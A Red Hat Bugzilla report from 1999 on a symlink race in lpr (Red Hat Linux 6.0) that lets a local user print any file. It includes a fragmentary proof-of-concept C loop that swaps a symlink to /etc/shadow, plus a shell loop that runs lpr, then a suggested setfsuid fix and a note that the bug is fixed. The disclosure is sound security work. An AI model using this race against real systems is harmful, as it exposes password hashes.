Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 5903 - race condition allows a user to read any file
Summary: race condition allows a user to read any file
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: lpr
Version: 6.0
Hardware: i386
OS: Linux
Target Milestone: ---
Assignee: Bill Nottingham
QA Contact:
Depends On:
TreeView+ depends on / blocked
Reported: 1999-10-13 03:43 UTC by tymm
Modified: 2014-03-17 02:10 UTC (History)
1 user (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Last Closed: 1999-10-18 03:20:42 UTC

Attachments (Terms of Use)

Description tymm 1999-10-13 03:43:50 UTC
time between the check between whether a file is accessable
or not and copying of the data in lpr allows a user to
use a symlink race exploit to print any file desired.

Tested by creating a deeply nested directory (I used 256
levels) and having a program change a link there between
/etc/shadow and a readable file, and then doing a while(1)
loop running lpr; after about 3-4 minutes on a P90,
/etc/shadow appeared in the print spool.

crud-level test code:
int main()

	char *file =

	while (1) {
		symlink("/tmp/test", file);
		symlink("/etc/shadow", file);


where /tmp/test is a user-readable file... used
while true; do lpr /tmp/0.../255/x; done
loop for the other half.

suggested fix:  use setfsuid() or seteuid() around points
where files are opened for reading.

Comment 1 Bill Nottingham 1999-10-18 03:20:59 UTC
Fixed in the lpr errata release.

Note You need to log in before you can comment on or make changes to this bug.